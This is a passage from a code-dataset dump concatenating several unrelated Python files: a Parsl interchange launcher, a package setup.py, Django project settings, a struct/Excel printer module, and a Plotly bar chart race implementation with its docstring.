formatter = logging.Formatter(format_string, datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
@wrap_with_logs(target="interchange")
def starter(comm_q, *args, **kwargs):
"""Start the interchange process
The executor is expected to call this function. The args, kwargs match that of the Interchange.__init__
"""
# logger = multiprocessing.get_logger()
ic = Interchange(*args, **kwargs)
comm_q.put((ic.worker_task_port,
ic.worker_result_port))
ic.start()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--client_address",
help="Client address")
parser.add_argument("-l", "--logdir", default="parsl_worker_logs",
help="Parsl worker log directory")
parser.add_argument("-t", "--task_url",
help="REQUIRED: ZMQ url for receiving tasks")
parser.add_argument("-r", "--result_url",
help="REQUIRED: ZMQ url for posting results")
parser.add_argument("-p", "--poll_period",
help="REQUIRED: poll period used for main thread")
parser.add_argument("--worker_ports", default=None,
help="OPTIONAL, pair of workers ports to listen on, eg --worker_ports=50001,50005")
parser.add_argument("-d", "--debug", action='store_true',
help="Count of apps to launch")
args = parser.parse_args()
# Setup logging
global logger
format_string = "%(asctime)s %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logger = logging.getLogger("interchange")
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setLevel('DEBUG' if args.debug is True else 'INFO')
formatter = logging.Formatter(format_string, datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.debug("Starting Interchange")
optionals = {}
if args.worker_ports:
optionals['worker_ports'] = [int(i) for i in args.worker_ports.split(',')]
ic = Interchange(**optionals)
ic.start()
| 45.659021 | 155 | 0.563176 |
5ea3437a2eb33d0a2e1796c20919e26b2a0222ca | 1,741 | py | Python | setup.py | AadamAbrahams/covid_traffic_controller_demonstrator | d782e5f8ba33259b06e24bfbc79c23a958065c0d | [
"MIT"
] | null | null | null | setup.py | AadamAbrahams/covid_traffic_controller_demonstrator | d782e5f8ba33259b06e24bfbc79c23a958065c0d | [
"MIT"
] | 1 | 2020-10-30T12:25:58.000Z | 2020-10-30T12:25:58.000Z | setup.py | AadamAbrahams/covid_traffic_controller_demonstrator | d782e5f8ba33259b06e24bfbc79c23a958065c0d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = ['Click>=7.0', ]
setup_requirements = [ ]
test_requirements = [ ]
setup(
author="Aadam Abrahams",
author_email='[email protected]',
python_requires='>=3.5',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
description="Python Boilerplate contains all the boilerplate you need to create a Python package.",
entry_points={
'console_scripts': [
'covid_traffic_controller_demonstrator=covid_traffic_controller_demonstrator.cli:main',
],
},
install_requires=requirements,
license="MIT license",
long_description=readme + '\n\n' + history,
include_package_data=True,
keywords='covid_traffic_controller_demonstrator',
name='covid_traffic_controller_demonstrator',
packages=find_packages(include=['covid_traffic_controller_demonstrator', 'covid_traffic_controller_demonstrator.*']),
setup_requires=setup_requirements,
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/AadamAbrahams/covid_traffic_controller_demonstrator',
version='0.1.0',
zip_safe=False,
)
| 32.240741 | 121 | 0.682941 |
5a4e556665f9fd12d67fff6f74fb86c6d27c68b8 | 4,092 | py | Python | core/settings/base.py | BuildForSDG/asylum-be | e44031ca97964425bfa11a1d9071e7584685c327 | [
"MIT"
] | null | null | null | core/settings/base.py | BuildForSDG/asylum-be | e44031ca97964425bfa11a1d9071e7584685c327 | [
"MIT"
] | 23 | 2020-05-07T07:57:44.000Z | 2022-03-12T00:36:41.000Z | core/settings/base.py | BuildForSDG/asylum-be | e44031ca97964425bfa11a1d9071e7584685c327 | [
"MIT"
] | 3 | 2020-05-02T07:56:55.000Z | 2020-05-19T14:42:54.000Z | """Django project core settings. Generated by 'django-admin startproject' using Django 2.2.10."""
import os
from decouple import config
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'allauth',
'allauth.account',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'django_filters',
'rest_framework_swagger',
'accounts',
'api',
'disorders',
'notifications',
'ratings',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'core.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Authentication settings
# Custom user model and related all-auth settings
AUTH_USER_MODEL = 'accounts.User'
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_SIGNUP_PASSWORD_ENTER_TWICE = False
OLD_PASSWORD_FIELD_ENABLED = True
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
REST_AUTH_SERIALIZERS = {
'USER_DETAILS_SERIALIZER': 'accounts.serializers.UserSerializer'
}
# Default DRF settings
# https://www.django-rest-framework.org/api-guide/permissions/
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework.authentication.TokenAuthentication',
],
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticated'
],
'DEFAULT_FILTER_BACKENDS': [
'django_filters.rest_framework.DjangoFilterBackend',
],
'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema'
}
# Rest swagger settings for API docs
# https://django-rest-swagger.readthedocs.io/en/latest/settings/
SWAGGER_SETTINGS = {
'SECURITY_DEFINITIONS': {
'api_key': {
'type': 'apiKey',
'description': 'Token authentication for Swagger UI Client',
'in': 'header',
'name': 'Authorization'
}
},
'USE_SESSION_AUTH': False,
}
# Site admins and managers
# https://docs.djangoproject.com/en/2.2/ref/settings/
ADMINS = (
('Mohammed Mwijaa', '[email protected]'),
)
MANAGERS = (
('Mohammed Mwijaa', '[email protected]'),
)
# Django sites settings
# https://docs.djangoproject.com/en/2.2/ref/contrib/sites/
SITE_ID = 1
# Django CORS headers settings
# https://github.com/adamchainz/django-cors-headers
CORS_ORIGIN_ALLOW_ALL = True
| 25.259259 | 97 | 0.700391 |
3c787fc51233f70eb034eea4afa2e180748c9200 | 4,510 | py | Python | ayed/printer.py | Bocanada/AyED-Tool | 6bc359734fab3601dd668c361e67c4b14afcb2da | [
"MIT"
] | 1 | 2021-08-01T16:40:11.000Z | 2021-08-01T16:40:11.000Z | ayed/printer.py | Bocanada/AyED-Tool | 6bc359734fab3601dd668c361e67c4b14afcb2da | [
"MIT"
] | 5 | 2021-06-20T18:53:06.000Z | 2021-06-26T23:44:05.000Z | ayed/printer.py | Bocanada/AyED-Tool | 6bc359734fab3601dd668c361e67c4b14afcb2da | [
"MIT"
] | null | null | null | from __future__ import annotations
from abc import ABC, abstractmethod
from collections import defaultdict
from pathlib import Path
from typing import Iterable
from attr import dataclass, field
from ayed.classes import Struct
from ayed.excel import Excel
from ayed.types import File, Files, Structs
from ayed.utils import add_includes, console, sanitize_name
class Printer(ABC):
@abstractmethod
def to_str(self):
return NotImplemented
@abstractmethod
def to_file(self):
return NotImplemented
@dataclass
class StructPrinter(Printer):
"""Printer prints out an iterable of structs to either a str or a file."""
structs: Iterable[Struct]
def to_str(self) -> str:
"""Writes all the structs and functions to a str and returns it"""
s = add_includes(
libs=[
"filesystem",
"cstdio",
"iostream",
"cstring",
"string",
"biblioteca/funciones/tokens.hpp",
],
)
fbody = [
f"{str(token)}{token.init()}{token.to_str()}{token.from_str()}{token.to_debug()}"
for token in self.structs
]
return s + "\n".join(fbody)
def to_file(self, path: Path) -> None:
"""Writes all the structs and functions to output_files/path"""
fns = self.to_str()
out = Path("output_files")
out.mkdir(exist_ok=True)
path = out / path
with path.open("w", encoding="utf-8") as fh:
fh.write(fns)
console.log(
f"[b]Output file: [magenta]{path.absolute().as_uri()}[/magenta][/b]",
justify="center",
)
@classmethod
def from_tokens(cls, tokens: Structs) -> "StructPrinter":
return cls(iter(tokens))
@dataclass(slots=True)
class ExcelPrinter(Printer):
file: Excel
output_folder: Path = Path("output_files")
data: File | Files = field(init=False)
def _write_one(
self, *, file: File = None, sheet_name: str | None = None
) -> dict[str, list[list[bytes]]]:
if not file:
file = self.data # type: ignore
sheet_name = sanitize_name(sheet_name or self.file.sheet) # type: ignore
packed_structs = defaultdict(list)
for fname, struct in file:
packed = struct.pack()
packed_structs[fname].append(packed)
return packed_structs # packs the struct into output_files/fname
def _write_many(self):
if not isinstance(self.data, list):
raise ValueError(
f"Expected {list} of {dict} but got {type(self.file)}."
" Try using struct_from_file instead."
)
return [
[
self._write_one(file=fh, sheet_name=sheet_name)
for (sheet_name, fh) in file.items()
]
for file in self.data
]
def _write(self, bytes: dict[str, list[list[bytes]]]):
for fname, data in bytes.items():
with (self.output_folder / fname).open("wb") as fh:
for raw_bytes in data[0]:
fh.write(raw_bytes)
def to_file(self):
if not self.output_folder.exists():
self.output_folder.mkdir(exist_ok=True)
if isinstance(self.data, File):
to_write = self._write_one()
self._write(to_write)
return True
to_write = self._write_many()
for bytes_list in to_write:
for packed_structs in bytes_list:
self._write(packed_structs)
return True
def to_table(self):
if isinstance(self.data, File):
for fname, struct in self.data:
struct.unpack(self.output_folder / fname)
return
for sheet in self.data:
for _, file in sheet.items():
for fname, struct in file:
struct.unpack(self.output_folder / fname)
def to_str(self):
if isinstance(self.data, File):
to_write = self._write_one()
return "".join(f"{fname} -->\n {data}" for fname, data in to_write.items())
raise NotImplementedError
def __enter__(self) -> "ExcelPrinter":
self.data = self.file.read()
return self
def __exit__(self, *args):
del self.data
return False
if __name__ == "__main__":
e = Excel("AlgoritmosFiles.xlsx")
with ExcelPrinter(e) as p:
p.to_file()
| 30.472973 | 93 | 0.578936 |
6e93388cd754866c8ce07ad0a60f42ed69f8a528 | 32,779 | py | Python | bar_chart_race/_bar_chart_race_plotly.py | fakegit/bar_chart_race | 0d2d038c4dac382419a36e33d54a7cc843a84724 | [
"MIT"
] | null | null | null | bar_chart_race/_bar_chart_race_plotly.py | fakegit/bar_chart_race | 0d2d038c4dac382419a36e33d54a7cc843a84724 | [
"MIT"
] | null | null | null | bar_chart_race/_bar_chart_race_plotly.py | fakegit/bar_chart_race | 0d2d038c4dac382419a36e33d54a7cc843a84724 | [
"MIT"
] | null | null | null | import warnings
import numpy as np
import pandas as pd
import plotly.graph_objects as go
import plotly
from ._utils import prepare_wide_data
class _BarChartRace:
def __init__(self, df, filename, orientation, sort, n_bars, fixed_order, fixed_max,
steps_per_period, period_length, end_period_pause, interpolate_period,
period_label, period_template, period_summary_func, perpendicular_bar_func,
colors, title, bar_size, bar_textposition, bar_texttemplate, bar_label_font,
tick_label_font, hovertemplate, slider, scale, bar_kwargs, layout_kwargs,
write_html_kwargs, filter_column_colors):
self.filename = filename
self.extension = self.get_extension()
self.orientation = orientation
self.sort = sort
self.n_bars = n_bars or df.shape[1]
self.fixed_order = fixed_order
self.fixed_max = fixed_max
self.steps_per_period = steps_per_period
self.period_length = period_length
self.end_period_pause = end_period_pause
self.interpolate_period = interpolate_period
self.period_label = self.get_period_label(period_label)
self.period_template = period_template
self.period_summary_func = period_summary_func
self.perpendicular_bar_func = perpendicular_bar_func
self.title = self.get_title(title)
self.bar_size = bar_size
self.bar_textposition = bar_textposition
self.bar_texttemplate = self.get_bar_texttemplate(bar_texttemplate)
self.bar_label_font = self.get_font(bar_label_font)
self.tick_label_font = self.get_font(tick_label_font)
self.hovertemplate = self.get_hovertemplate(hovertemplate)
self.slider = slider
self.scale = scale
self.duration = self.period_length / steps_per_period
self.write_html_kwargs = write_html_kwargs or {}
self.filter_column_colors = filter_column_colors
self.validate_params()
self.bar_kwargs = self.get_bar_kwargs(bar_kwargs)
self.layout_kwargs = self.get_layout_kwargs(layout_kwargs)
self.df_values, self.df_ranks = self.prepare_data(df)
self.col_filt = self.get_col_filt()
self.bar_colors = self.get_bar_colors(colors)
self.set_fixed_max_limits()
self.str_index = self.df_values.index.astype('str')
def get_extension(self):
if self.filename:
return self.filename.split('.')[-1]
def get_bar_texttemplate(self, bar_texttemplate):
if bar_texttemplate is None:
bar_texttemplate = '%{x:,.0f}' if self.orientation == 'h' else '%{y:,.0f}'
return bar_texttemplate
def validate_params(self):
if isinstance(self.filename, str):
if '.' not in self.filename:
raise ValueError('`filename` must have an extension')
elif self.filename is not None:
raise TypeError('`filename` must be None or a string')
if self.sort not in ('asc', 'desc'):
raise ValueError('`sort` must be "asc" or "desc"')
if self.orientation not in ('h', 'v'):
raise ValueError('`orientation` must be "h" or "v"')
def get_bar_kwargs(self, bar_kwargs):
if bar_kwargs is None:
return {'opacity': .8}
elif isinstance(bar_kwargs, dict):
if 'opacity' not in bar_kwargs:
bar_kwargs['opacity'] = .8
return bar_kwargs
raise TypeError('`bar_kwargs` must be None or a dictionary mapping `go.Bar` parameters '
'to values.')
def get_layout_kwargs(self, layout_kwargs):
if layout_kwargs is None:
return {'showlegend': False}
elif isinstance(layout_kwargs, dict):
if {'xaxis', 'yaxis', 'annotations'} & layout_kwargs.keys():
raise ValueError('`layout_kwargs` cannot contain "xaxis", "yaxis", or '
' "annotations".')
if 'showlegend' not in layout_kwargs:
layout_kwargs['showlegend'] = False
return layout_kwargs
elif isinstance(layout_kwargs, plotly.graph_objs._layout.Layout):
return self.get_layout_kwargs(layout_kwargs.to_plotly_json())
raise TypeError('`layout_kwargs` must be None, a dictionary mapping '
'`go.Layout` parameters to values or an instance of `go.Layout`.')
def get_period_label(self, period_label):
if period_label is False:
return False
default_period_label = {'xref': 'paper', 'yref': 'paper', 'font': {'size': 20},
'xanchor': 'right', 'showarrow': False}
if self.orientation == 'h':
default_period_label['x'] = .95
default_period_label['y'] = .15 if self.sort == 'desc' else .85
else:
default_period_label['x'] = .95 if self.sort == 'desc' else .05
default_period_label['y'] = .85
default_period_label['xanchor'] = 'left' if self.sort == 'asc' else 'right'
if period_label is True:
return default_period_label
elif isinstance(period_label, dict):
period_label = {**default_period_label, **period_label}
else:
raise TypeError('`period_label` must be a boolean or dictionary')
return period_label
def get_title(self, title):
if title is None:
return
if isinstance(title, str):
return {'text': title, 'y': 1, 'x': .5, 'xref': 'paper', 'yref': 'paper',
'pad': {'b': 10},
'xanchor': 'center', 'yanchor': 'bottom'}
elif isinstance(title, (dict, plotly.graph_objects.layout.Title)):
return title
raise TypeError('`title` must be a string, dictionary, or '
'`plotly.graph_objects.layout.Title` instance')
def get_font(self, font):
if font is None:
font = {'size': 12}
elif isinstance(font, (int, float)):
font = {'size': font}
elif not isinstance(font, dict):
raise TypeError('`font` must be a number or dictionary of font properties')
return font
def get_hovertemplate(self, hovertemplate):
if hovertemplate is None:
if self.orientation == 'h':
return '%{y} - %{x:,.0f}<extra></extra>'
return '%{x} - %{y:,.0f}<extra></extra>'
return hovertemplate
def prepare_data(self, df):
if self.fixed_order is True:
last_values = df.iloc[-1].sort_values(ascending=False)
cols = last_values.iloc[:self.n_bars].index
df = df[cols]
elif isinstance(self.fixed_order, list):
cols = self.fixed_order
df = df[cols]
self.n_bars = min(len(cols), self.n_bars)
compute_ranks = self.fixed_order is False
dfs = prepare_wide_data(df, orientation=self.orientation, sort=self.sort,
n_bars=self.n_bars, interpolate_period=self.interpolate_period,
steps_per_period=self.steps_per_period, compute_ranks=compute_ranks)
if isinstance(dfs, tuple):
df_values, df_ranks = dfs
else:
df_values = dfs
if self.fixed_order:
n = df_values.shape[1] + 1
m = df_values.shape[0]
rank_row = np.arange(1, n)
if (self.sort == 'desc' and self.orientation == 'h') or \
(self.sort == 'asc' and self.orientation == 'v'):
rank_row = rank_row[::-1]
ranks_arr = np.repeat(rank_row.reshape(1, -1), m, axis=0)
df_ranks = pd.DataFrame(data=ranks_arr, columns=cols)
return df_values, df_ranks
def get_col_filt(self):
col_filt = pd.Series([True] * self.df_values.shape[1])
if self.n_bars < self.df_ranks.shape[1]:
orient_sort = self.orientation, self.sort
if orient_sort in [('h', 'asc'), ('v', 'desc')]:
# 1 is high
col_filt = (self.df_ranks < self.n_bars + .99).any()
else:
# 1 is low
col_filt = (self.df_ranks > 0).any()
if self.filter_column_colors and not col_filt.all():
self.df_values = self.df_values.loc[:, col_filt]
self.df_ranks = self.df_ranks.loc[:, col_filt]
return col_filt
def get_bar_colors(self, colors):
if colors is None:
colors = 'dark12'
if self.df_values.shape[1] > 10:
colors = 'dark24'
if isinstance(colors, str):
from ._colormaps import colormaps
try:
bar_colors = colormaps[colors.lower()]
except KeyError:
raise KeyError(f'Colormap {colors} does not exist. Here are the '
f'possible colormaps: {colormaps.keys()}')
elif isinstance(colors, list):
bar_colors = colors
elif isinstance(colors, tuple):
bar_colors = list(colors)
elif hasattr(colors, 'tolist'):
bar_colors = colors.tolist()
else:
raise TypeError('`colors` must be a string name of a colormap or '
'sequence of colors.')
# bar_colors is now a list
n = len(bar_colors)
orig_bar_colors = bar_colors
if self.df_values.shape[1] > n:
bar_colors = bar_colors * (self.df_values.shape[1] // n + 1)
bar_colors = np.array(bar_colors[:self.df_values.shape[1]])
# plotly uses 0, 255 rgb colors, matplotlib is 0 to 1
if bar_colors.dtype.kind == 'f' and bar_colors.shape[1] == 3 and (bar_colors <= 1).all():
bar_colors = pd.DataFrame(bar_colors).astype('str')
bar_colors = bar_colors.apply(lambda x: ','.join(x), axis = 1)
bar_colors = ('rgb(' + bar_colors + ')').values
if not self.filter_column_colors:
if not self.col_filt.all():
col_idx = np.where(self.col_filt)[0] % n
col_idx_ct = np.bincount(col_idx, minlength=n)
num_cols = max(self.col_filt.sum(), n)
exp_ct = np.bincount(np.arange(num_cols) % n, minlength=n)
if (col_idx_ct > exp_ct).any():
warnings.warn("Some of your columns never make an appearance in the animation. "
"To reduce color repetition, set `filter_column_colors` to `True`")
return bar_colors
def set_fixed_max_limits(self):
label_limit = (.2, self.n_bars + .8)
value_limit = None
min_val = 1 if self.scale == 'log' else 0
if self.fixed_max:
value_limit = [min_val, self.df_values.max().max() * 1.1]
if self.orientation == 'h':
self.xlimit = value_limit
self.ylimit = label_limit
else:
self.xlimit = label_limit
self.ylimit = value_limit
def set_value_limit(self, bar_vals):
min_val = 1 if self.scale == 'log' else 0
if not self.fixed_max:
value_limit = [min_val, bar_vals.max() * 1.1]
if self.orientation == 'h':
self.xlimit = value_limit
else:
self.ylimit = value_limit
def get_frames(self):
frames = []
slider_steps = []
for i in range(len(self.df_values)):
bar_locs = self.df_ranks.iloc[i].values
top_filt = (bar_locs >= 0) & (bar_locs < self.n_bars + 1)
bar_vals = self.df_values.iloc[i].values
bar_vals[bar_locs == 0] = 0
bar_vals[bar_locs == self.n_bars + 1] = 0
# self.set_value_limit(bar_vals) # plotly bug? not updating range
cols = self.df_values.columns.values.copy()
cols[bar_locs == 0] = ' '
colors = self.bar_colors
bar_locs = bar_locs + np.random.rand(len(bar_locs)) / 10_000 # done to prevent stacking of bars
x, y = (bar_vals, bar_locs) if self.orientation == 'h' else (bar_locs, bar_vals)
label_axis = dict(tickmode='array', tickvals=bar_locs, ticktext=cols,
tickfont=self.tick_label_font)
label_axis['range'] = self.ylimit if self.orientation == 'h' else self.xlimit
if self.orientation == 'v':
label_axis['tickangle'] = -90
value_axis = dict(showgrid=True, type=self.scale)#, tickformat=',.0f')
value_axis['range'] = self.xlimit if self.orientation == 'h' else self.ylimit
bar = go.Bar(x=x, y=y, width=self.bar_size, textposition=self.bar_textposition,
texttemplate=self.bar_texttemplate, orientation=self.orientation,
marker_color=colors, insidetextfont=self.bar_label_font,
cliponaxis=False, outsidetextfont=self.bar_label_font,
hovertemplate=self.hovertemplate, **self.bar_kwargs)
data = [bar]
xaxis, yaxis = (value_axis, label_axis) if self.orientation == 'h' \
else (label_axis, value_axis)
annotations = self.get_annotations(i)
if self.slider and i % self.steps_per_period == 0:
slider_steps.append(
{"args": [[i],
{"frame": {"duration": self.duration, "redraw": False},
"mode": "immediate",
"fromcurrent": True,
"transition": {"duration": self.duration}
}],
"label": self.get_period_label_text(i),
"method": "animate"})
layout = go.Layout(xaxis=xaxis, yaxis=yaxis, annotations=annotations,
margin={'l': 150}, **self.layout_kwargs)
if self.perpendicular_bar_func:
pbar = self.get_perpendicular_bar(bar_vals, i, layout)
layout.update(shapes=[pbar], overwrite=True)
frames.append(go.Frame(data=data, layout=layout, name=i))
return frames, slider_steps
def get_period_label_text(self, i):
if self.period_template:
idx_val = self.df_values.index[i]
if self.df_values.index.dtype.kind == 'M':
s = idx_val.strftime(self.period_template)
else:
s = self.period_template.format(x=idx_val)
else:
s = self.str_index[i]
return s
def get_annotations(self, i):
annotations = []
if self.period_label:
self.period_label['text'] = self.get_period_label_text(i)
annotations.append(self.period_label)
if self.period_summary_func:
values = self.df_values.iloc[i]
ranks = self.df_ranks.iloc[i]
text_dict = self.period_summary_func(values, ranks)
if 'x' not in text_dict or 'y' not in text_dict or 'text' not in text_dict:
name = self.period_summary_func.__name__
raise ValueError(f'The dictionary returned from `{name}` must contain '
'"x", "y", and "s"')
text, x, y = text_dict['text'], text_dict['x'], text_dict['y']
annotations.append(dict(text=text, x=x, y=y, font=dict(size=14),
xref="paper", yref="paper", showarrow=False))
return annotations
def get_perpendicular_bar(self, bar_vals, i, layout):
if isinstance(self.perpendicular_bar_func, str):
val = pd.Series(bar_vals).agg(self.perpendicular_bar_func)
else:
values = self.df_values.iloc[i]
ranks = self.df_ranks.iloc[i]
val = self.perpendicular_bar_func(values, ranks)
xref, yref = ("x", "paper") if self.orientation == 'h' else ("paper", "y")
value_limit = self.xlimit if self.orientation == 'h' else self.ylimit
if self.fixed_max:
delta = (value_limit[1] - value_limit[0]) * .02
else:
delta = (1.05 * bar_vals.max() - bar_vals.min()) * .02
x0, x1 = (val - delta, val + delta) if self.orientation == 'h' else (0, 1)
y0, y1 = (val - delta, val + delta) if self.orientation == 'v' else (0, 1)
return dict(type="rect", xref=xref, yref=yref, x0=x0, y0=y0, x1=x1, y1=y1,
fillcolor="#444444",layer="below", opacity=.5, line_width=0)
def make_animation(self):
frames, slider_steps = self.get_frames()
data = frames[0].data
layout = frames[0].layout
layout.title = self.title
layout.updatemenus = [dict(
type="buttons",
direction = "left",
x=1,
y=1.02,
xanchor='right',
yanchor='bottom',
buttons=[dict(label="Play",
method="animate",
# redraw must be true for bar plots
args=[None, {"frame": {"duration": self.duration, "redraw": True},
"fromcurrent": True
}]),
dict(label="Pause",
method="animate",
args=[[None], {"frame": {"duration": 0, "redraw": False},
"mode": "immediate",
"transition": {"duration": 0}}]),
]
)]
sliders_dict = {
"active": 0,
"yanchor": "top",
"xanchor": "left",
"currentvalue": {
# "font": {"size": 20},
# "prefix": '', # allow user to set
"visible": False, # just repeats period label
# "xanchor": "right"
},
"transition": {"duration": self.duration, "easing": "cubic-in-out"},
"pad": {"b": 10, "t": 50},
"len": 0.88,
"x": 0.05,
"y": 0,
"steps": slider_steps
}
if self.slider:
layout.sliders = [sliders_dict]
fig = go.Figure(data=data, layout=layout, frames=frames[1:])
if self.filename:
fig.write_html(self.filename, **self.write_html_kwargs)
else:
return fig
def bar_chart_race_plotly(df, filename=None, orientation='h', sort='desc', n_bars=None,
fixed_order=False, fixed_max=False, steps_per_period=10,
period_length=500, end_period_pause=0, interpolate_period=False,
period_label=True, period_template=None, period_summary_func=None,
perpendicular_bar_func=None, colors=None, title=None, bar_size=.95,
bar_textposition='outside', bar_texttemplate=None, bar_label_font=None,
tick_label_font=None, hovertemplate=None, slider=True, scale='linear',
bar_kwargs=None, layout_kwargs=None, write_html_kwargs=None,
filter_column_colors=False):
'''
Create an animated bar chart race using Plotly. Data must be in
'wide' format where each row represents a single time period and each
column represents a distinct category. Optionally, the index can label
the time period. Bar length and location change linearly from one time
period to the next.
Note - The duration of each frame is calculated as
`period_length` / `steps_per_period`, but is unlikely to actually
be this number, especially when duration is low (< 50ms). You may have to
experiment with different combinations of `period_length` and
`steps_per_period` to get the animation at the desired speed.
If no `filename` is given, a plotly figure is returned that is embedded
into the notebook.
Parameters
----------
df : pandas DataFrame
Must be a 'wide' DataFrame where each row represents a single period
of time. Each column contains the values of the bars for that
category. Optionally, use the index to label each time period.
The index can be of any type.
filename : `None` or str, default None
If `None` return plotly animation, otherwise save
to disk. Can only save as HTML at this time.
orientation : 'h' or 'v', default 'h'
Bar orientation - horizontal or vertical
sort : 'desc' or 'asc', default 'desc'
Choose how to sort the bars. Use 'desc' to put largest bars on top
and 'asc' to place largest bars on bottom.
n_bars : int, default None
Choose the maximum number of bars to display on the graph.
By default, use all bars. New bars entering the race will appear
from the edge of the axes.
fixed_order : bool or list, default False
When `False`, bar order changes every time period to correspond
with `sort`. When `True`, bars remained fixed according to their
final value corresponding with `sort`. Otherwise, provide a list
of the exact order of the categories for the entire duration.
fixed_max : bool, default False
Whether to fix the maximum value of the axis containing the values.
When `False`, the axis for the values will have its maximum (x/y)
just after the largest bar of the current time period.
The axis maximum will change along with the data.
When True, the maximum axis value will remain constant for the
duration of the animation. For example, in a horizontal bar chart,
if the largest bar has a value of 100 for the first time period and
10,000 for the last time period. The xlim maximum will be 10,000
for each frame.
steps_per_period : int, default 10
The number of steps to go from one time period to the next.
The bars will grow linearly between each period.
period_length : int, default 500
Number of milliseconds to animate each period (row).
Default is 500ms (half of a second)
end_period_pause : int, default 0
Number of milliseconds to pause the animation at the end of
each period.
interpolate_period : bool, default `False`
Whether to interpolate the period. Only valid for datetime or
numeric indexes. When set to `True`, for example,
the two consecutive periods 2020-03-29 and 2020-03-30 with
`steps_per_period` set to 4 would yield a new index of
2020-03-29 00:00:00
2020-03-29 06:00:00
2020-03-29 12:00:00
2020-03-29 18:00:00
2020-03-30 00:00:00
period_label : bool or dict, default `True`
If `True` or dict, use the index as a large text label
on the figure labeling each period. No label when 'False'.
Use a dictionary to supply the exact position of the period
along with any valid parameters of a plotly annotation.
Example:
{
'x': .99,
'y': .8,
'font' : {'family': 'Helvetica', 'size': 20, 'color': 'orange'},
'xanchor': 'right',
}
Reference - https://plotly.com/python/reference/#layout-annotations
The default location depends on `orientation` and `sort`
* h, desc -> x=.95, y=.15
* h, asc -> x=.95, y=.85
* v, desc -> x=.95, y=.85
* v, asc -> x=.05, y=.85
period_template : str, default `None`
Either a string with date directives or
a new-style (Python 3.6+) formatted string
For a string with a date directive, find the complete list here
https://docs.python.org/3/library/datetime.html#strftime-and-strptime-format-codes
Example of string with date directives
'%B %d, %Y'
Will change 2020/03/29 to March 29, 2020
For new-style formatted string. Use curly braces and the variable `x`,
which will be passed the current period's index value.
Example:
'Period {x:10.2f}'
Date directives will only be used for datetime indexes.
period_summary_func : function, default None
Custom text added to the axes each period.
Create a user-defined function that accepts two pandas Series of the
current time period's values and ranks. It must return a dictionary
containing at a minimum the keys "x", "y", and "text" which will be
passed used for a plotly annotation.
Example:
def func(values, ranks):
total = values.sum()
text = f'Worldwide deaths: {total}'
return {'x': .85, 'y': .2, 'text': text, 'size': 11}
perpendicular_bar_func : function or str, default None
Creates a single bar perpendicular to the main bars that spans the
length of the axis.
Use either a string that the DataFrame `agg` method understands or a
user-defined function.
DataFrame strings - 'mean', 'median', 'max', 'min', etc..
The function is passed two pandas Series of the current time period's
data and ranks. It must return a single value.
def func(values, ranks):
return values.quantile(.75)
colors : str or sequence colors, default 'dark12'
Colors to be used for the bars. All matplotlib and plotly colormaps are
available by string name. Colors will repeat if there are more bars than colors.
'dark12' is the default colormap. If there are more than 10 columns,
then the default colormap will be 'dark24'
Append "_r" to the colormap name to use the reverse of the colormap.
i.e. "dark12_r"
title : str, dict, or plotly.graph_objects.layout.Title , default None
Title of animation. Use a string for simple titles or a
dictionary to specify several properties
{'text': 'My Bar Chart Race',
'x':0.5,
'y':.9,
'xanchor': 'center',
'yanchor': 'bottom'}
Other properties include: font, pad, xref, yref
bar_size : float, default .95
Height/width of bars for horizontal/vertical bar charts.
Use a number between 0 and 1
Represents the fraction of space that each bar takes up.
When equal to 1, no gap remains between the bars.
bar_textposition : str or sequence, default `None`
Position on bar to place its label.
Use one of the strings - 'inside', 'outside', 'auto', 'none'
or a sequence of the above
